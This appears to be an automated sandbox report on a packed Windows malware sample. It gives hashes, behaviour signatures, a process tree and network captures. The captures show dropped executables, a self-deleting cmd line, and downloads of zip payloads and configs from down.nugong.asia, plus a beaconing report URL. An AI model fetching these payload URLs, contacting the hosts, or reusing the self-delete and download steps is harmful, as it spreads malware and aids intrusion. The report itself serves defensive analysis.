Analysis

  • max time kernel
    153s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04/10/2023, 10:50 UTC

General

  • Target

    1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe

  • Size

    271KB

  • MD5

    eb6c2b720bf1204827e513af9b93fc04

  • SHA1

    da49da66e4d4ce6a9c656f821eaed25ad599f772

  • SHA256

    1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b

  • SHA512

    e8e1723052346d31abb701b87b8deedb002fe42bc899d99efd040f13ee6e4b2516ee6f193ae7bb130280bf18ac959a29073245024256d87562aaa14ef5b5d649

  • SSDEEP

    6144:/l51orRJXlDixHkUXe34cEOkCybEaQRXr9HNdvOa:xqXUHkUXe3GOkx2LIa

Score
10/10
upx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 26 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Program Files\getmac.exe
        "C:\Program Files\getmac.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Checks SCSI registry key(s)
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1836
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe
        "C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"
        2⤵
        • Checks computer location settings
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:3176
    • C:\Windows\Syswow64\eda5f540
      C:\Windows\Syswow64\eda5f540
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Windows\Syswow64\eda5f540"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 1
          3⤵
          • Delays execution with timeout.exe
          PID:8

Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dns.google
    • flag-us
      DNS
      4.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      4.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.154.82.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.154.82.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      down.nugong.asia
      eda5f540
      Remote address:
      114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      116.163.24.195
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.188.86.194
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      1.62.64.68
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      221.15.67.105
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.7.60.104
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.167.229.212
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      116.172.148.7
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      218.29.205.139
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.235.196
    • flag-cn
      GET
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip
      eda5f540
      Remote address:
      116.163.24.195:443
      Request
      GET /pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 03 Aug 2023 03:22:49 GMT
      Etag: "07cd7f7ac6965327899891eef3600839"
      Content-Type: application/zip
      Date: Fri, 29 Sep 2023 06:36:44 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7570708988939014002
      x-cos-request-id: NjUxNjcwN2JfZWYzNDY4MDlfZmZiMV8zMjA2MjFl
      Content-Length: 463923
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12384900960947331076
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      114.114.114.114.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.114.114.114.in-addr.arpa
      IN PTR
      Response
      114.114.114.114.in-addr.arpa
      IN PTR
      public1.114dns.com
    • flag-us
      DNS
      208.194.73.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      208.194.73.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.20.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.20.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      195.24.163.116.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      195.24.163.116.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      41.110.16.96.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      41.110.16.96.in-addr.arpa
      IN PTR
      Response
      41.110.16.96.in-addr.arpa
      IN PTR
      a96-16-110-41.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.a-0001.a-msedge.net
      g-bing-com.a-0001.a-msedge.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8; domain=.bing.com; expires=Mon, 28-Oct-2024 10:50:51 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 50A86AF3DA0847F99BFCA6DE34A5E6E4 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:50 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 013C11163CC54F218AAC12C8355BD2E0 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:50 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6F291559A6A84DDCAB71D3D8B53F91F6 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
      date: Wed, 04 Oct 2023 10:50:51 GMT
    • flag-us
      DNS
      200.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.197.79.204.in-addr.arpa
      IN PTR
      Response
      200.197.79.204.in-addr.arpa
      IN PTR
      a-0001.a-msedge.net
    • flag-us
      DNS
      26.35.223.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.35.223.20.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 03:05:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11160378879197059676
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 03:05:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 9106975594564456352
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userchange.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:56:00 GMT
      Etag: "5001520cededdba4392d6d3c567a2306"
      Content-Type: text/plain
      Date: Fri, 28 Jul 2023 06:26:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12026736056808147491
      x-cos-meta-md5: 5001520cededdba4392d6d3c567a2306
      x-cos-request-id: NjRjMzVmOTBfOGUzYzY4MDlfODQ3Y18xOTUwMzk1
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7098320501899191445
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userpq.zip
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 02 Oct 2023 08:00:15 GMT
      Etag: "fad231aeeb4c2eac2ff215a8172da6e7"
      Content-Type: application/zip
      Date: Mon, 02 Oct 2023 08:01:38 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17983149572618678898
      x-cos-request-id: NjUxYTc4ZTJfZGFlZjk4MWVfMzA0ZF8yZDIyNTYw
      Content-Length: 13408
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6547221676952680527
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/blacklist.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 28 Sep 2023 07:54:14 GMT
      Etag: "81074a24b7f65c6446b4f014291bbbcb"
      Content-Type: text/plain
      Date: Thu, 28 Sep 2023 07:57:21 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11643962358373933104
      x-cos-request-id: NjUxNTMxZTBfNTBkNzdkMDlfMWI4NDFfMjY1MGRhYw==
      Content-Length: 12016
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 13668875218857656321
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 22 Aug 2023 06:33:29 GMT
      Etag: "1eba8e243164ae3e2c9243d802c5fd79"
      Content-Type: application/json
      Date: Tue, 22 Aug 2023 06:37:06 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3320060066327462193
      x-cos-request-id: NjRlNDU3OTJfNzRlZDk4MWVfYTI2Yl8zZGMxODk2
      Content-Length: 7248
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1285885473667175676
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ms.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 09:22:12 GMT
      Etag: "10040ea185914984ce16a2e607ba5ffc"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 09:25:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 1369726845627411732
      x-cos-request-id: NjUxZDJmODJfNjhlZTk4MWVfYjBkNF8zMDg2YzBi
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5664306608322357654
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ps.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 09:22:12 GMT
      Etag: "38f11ea8d0226630fb9251be3a7b1e4b"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 09:25:19 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5867845126828716719
      x-cos-request-id: NjUxZDJmN2ZfZGUxNWJlMDlfNzYyYV8yNTFkZGZm
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10896722524334358152
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 18 Aug 2023 07:39:30 GMT
      Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
      Content-Type: application/zip
      Date: Thu, 28 Sep 2023 19:24:41 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11311802544265698830
      x-cos-request-id: NjUxNWQyZjlfMjUxNWFlMDlfMTJmMGVfMTI0NzY3Nw==
      Content-Length: 902517
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 2246552894700331726
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/Lander.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/Lander.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 27 Sep 2023 08:22:42 GMT
      Etag: "75280d3857e9c4a765490c9349019639"
      Content-Type: text/plain
      Date: Wed, 27 Sep 2023 08:25:58 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7593444196225492913
      x-cos-request-id: NjUxM2U3MTZfYWUyMzFkMDlfMTcwODBfMWI5ZmQyMQ==
      Content-Length: 22928
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 15607132006774316370
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/psexe.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:27:26 GMT
      Etag: "61dce90040ba158479521e19bcdc6546"
      Content-Type: text/plain
      Date: Wed, 04 Oct 2023 10:30:35 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7528396351655483740
      x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
      Content-Length: 10896
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6735520674813256835
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://mprrpt.nugong.asia/report.php?data=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
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /report.php?data=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 HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Wed, 04 Oct 2023 10:50:34 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 3369223833385548566
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/urlmd5.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:49:02 GMT
      Etag: "a3545255258e02fabc6eef66423e1963"
      Content-Type: application/json
      Date: Wed, 04 Oct 2023 10:51:03 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 18144626213925968174
      x-cos-request-id: NjUxZDQzOTdfYTUwMTQwYl8yZjUwXzQ4YjlkOTg=
      Content-Length: 464
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5886285415037095995
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      apps.game.qq.com
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.49
      apps.game.qq.com
      IN A
      101.227.134.27
    • flag-cn
      GET
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      getmac.exe
      Remote address:
      101.227.134.49:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Wed, 04 Oct 2023 10:50:56 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • flag-us
      DNS
      ocsp.digicert.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      getmac.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Wed, 04 Oct 2023 10:38:27 GMT
      Ali-Swift-Global-Savetime: 1696415907
      Via: cache2.l2de2[304,35,200-0,C], cache20.l2de2[36,0], cache5.nl2[0,0,200-0,H], cache8.nl2[1,0]
      Age: 749
      X-Cache: HIT TCP_MEM_HIT dirn:11:227517273
      X-Swift-SaveTime: Wed, 04 Oct 2023 10:38:27 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309c16964166562002682e
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      getmac.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Wed, 04 Oct 2023 10:50:40 GMT
      Ali-Swift-Global-Savetime: 1696416640
      Via: cache5.l2de2[4,3,200-0,M], cache14.l2de2[5,0], cache8.nl2[0,0,200-0,H], cache8.nl2[1,0]
      Age: 16
      X-Cache: HIT TCP_MEM_HIT dirn:6:22464691
      X-Swift-SaveTime: Wed, 04 Oct 2023 10:50:40 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309c16964166562562901e
    • flag-us
      DNS
      49.134.227.101.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      49.134.227.101.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      205.48.246.47.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.48.246.47.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      sp1.baidu.com
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      104.193.88.77
      www.wshifen.com
      IN A
      104.193.88.123
    • flag-us
      GET
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      getmac.exe
      Remote address:
      104.193.88.77:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Wed, 04 Oct 2023 10:50:58 GMT
      Expires: Wed, 04 Oct 2023 10:50:58 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=B3390398C56DC0BD924D34F50CA5B6C0:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
